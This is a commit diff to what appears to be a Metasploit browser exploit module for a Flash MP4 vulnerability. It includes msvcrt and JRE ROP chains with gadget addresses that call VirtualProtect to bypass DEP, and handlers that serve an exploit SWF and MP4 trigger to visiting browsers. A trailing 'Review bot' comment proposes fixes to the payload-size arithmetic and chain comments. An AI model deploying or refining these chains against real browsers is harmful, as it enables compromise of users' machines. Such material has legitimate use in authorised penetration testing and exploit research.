Dynamic VirtualProtect dwSize. Change output style.
parent
de888e50f0
commit
25a1552fbd
|
@ -135,7 +135,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# Both ROP chains generated by mona.py - See corelan.be
|
# Both ROP chains generated by mona.py - See corelan.be
|
||||||
case t['Rop']
|
case t['Rop']
|
||||||
when :msvcrt
|
when :msvcrt
|
||||||
print_status("Using msvcrt ROP against #{cli.peerhost}:#{cli.peerport}")
|
print_status("#{cli.peerhost}:#{cli.peerport} - Using msvcrt ROP")
|
||||||
|
exec_size = code.length
|
||||||
rop =
|
rop =
|
||||||
[
|
[
|
||||||
0x77c4e392, # POP EAX # RETN
|
0x77c4e392, # POP EAX # RETN
|
||||||
|
@ -146,24 +147,25 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
0x77c4ec00, # POP EBP # RETN
|
0x77c4ec00, # POP EBP # RETN
|
||||||
0x77c35459, # ptr to 'push esp # ret'
|
0x77c35459, # ptr to 'push esp # ret'
|
||||||
0x77c47705, # POP EBX # RETN
|
0x77c47705, # POP EBX # RETN
|
||||||
0x00000800, # <- change size to mark as executable if needed (-> ebx)
|
exec_size, # EBX
|
||||||
0x77c3ea01, # POP ECX # RETN
|
0x77c3ea01, # POP ECX # RETN
|
||||||
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
|
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
|
||||||
0x77c46100, # POP EDI # RETN
|
0x77c46100, # POP EDI # RETN
|
||||||
0x77c46101, # ROP NOP (-> edi)
|
0x77c46101, # ROP NOP (-> edi)
|
||||||
0x77c4d680, # POP EDX # RETN
|
0x77c4d680, # POP EDX # RETN
|
||||||
0x00000040, # newProtect (0x40) (-> edx)
|
0x00000040, # newProtect (0x40) (-> edx)
|
||||||
0x77c4e392, # POP EAX # RETN
|
0x77c4e392, # POP EAX # RETN
|
||||||
nop, # NOPS (-> eax)
|
nop, # NOPS (-> eax)
|
||||||
0x77c12df9, # PUSHAD # RETN
|
0x77c12df9, # PUSHAD # RETN
|
||||||
].pack("V*")
|
].pack("V*")
|
||||||
|
|
||||||
when :jre
|
when :jre
|
||||||
print_status("Using JRE ROP against #{cli.peerhost}:#{cli.peerport}")
|
print_status("#{cli.peerhost}:#{cli.peerport} - Using JRE ROP")
|
||||||
|
exec_size = [0-code.length].pack('V').unpack('L')[0].to_i
|
||||||
rop =
|
rop =
|
||||||
[
|
[
|
||||||
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
|
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
|
||||||
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
|
exec_size, # Value to negate, will become 0x00000201 (dwSize)
|
||||||
0x7c347f98, # RETN (ROP NOP)
|
0x7c347f98, # RETN (ROP NOP)
|
||||||
0x7c3415a2, # JMP [EAX]
|
0x7c3415a2, # JMP [EAX]
|
||||||
0xffffffff,
|
0xffffffff,
|
||||||
|
@ -217,23 +219,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||||
if my_target.nil?
|
if my_target.nil?
|
||||||
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
|
print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
|
||||||
send_not_found(cli)
|
send_not_found(cli)
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("#{cli.peerhost}:#{cli.peerport} Client requesting: #{request.uri}")
|
print_status("#{cli.peerhost}:#{cli.peerport} - Client requesting: #{request.uri}")
|
||||||
|
|
||||||
# The SWF requests our MP4 trigger
|
# The SWF requests our MP4 trigger
|
||||||
if request.uri =~ /\.mp4$/
|
if request.uri =~ /\.mp4$/
|
||||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending MP4...")
|
print_status("#{cli.peerhost}:#{cli.peerport} - Sending MP4...")
|
||||||
mp4 = create_mp4(my_target)
|
mp4 = create_mp4(my_target)
|
||||||
send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
|
send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
if request.uri =~ /\.swf$/
|
if request.uri =~ /\.swf$/
|
||||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending Exploit SWF...")
|
print_status("#{cli.peerhost}:#{cli.peerport} - Sending Exploit SWF...")
|
||||||
send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
|
send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
@ -305,7 +307,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer">
|
||||||
end
|
end
|
||||||
|
|
||||||
add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil
|
add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil
|
||||||
print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
|
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
|
||||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||||
end
|
end
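Review bot: The comment on the negated size in the JRE chain is now stale — `exec_size, # Value to negate, will become 0x00000201 (dwSize)` still describes the removed constant 0xfffffdff, while the value now comes from code.length; `exec_size, # Value to negate, becomes code.length (dwSize)` matches the new behaviour. The conversion `exec_size = [0-code.length].pack('V').unpack('L')[0].to_i` packs little-endian but unpacks native-endian and ends with a redundant to_i; `exec_size = (-code.length) & 0xffffffff` yields the same 32-bit two's-complement value on any host byte order. In the msvcrt hunk the new comment `exec_size, # EBX` dropped the information that this slot is the VirtualProtect dwSize; `exec_size, # dwSize (-> ebx)` keeps the chain readable without the old "change size" note. Neither hunk guards against code.length being 0 (presumably an empty payload cannot occur here, but a dwSize of 0 would make the protection change fail silently), and the enclosing method starts before the first hunk while both ROP arrays continue past the hunks shown.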
|
||||||
|
|
||||||
|
|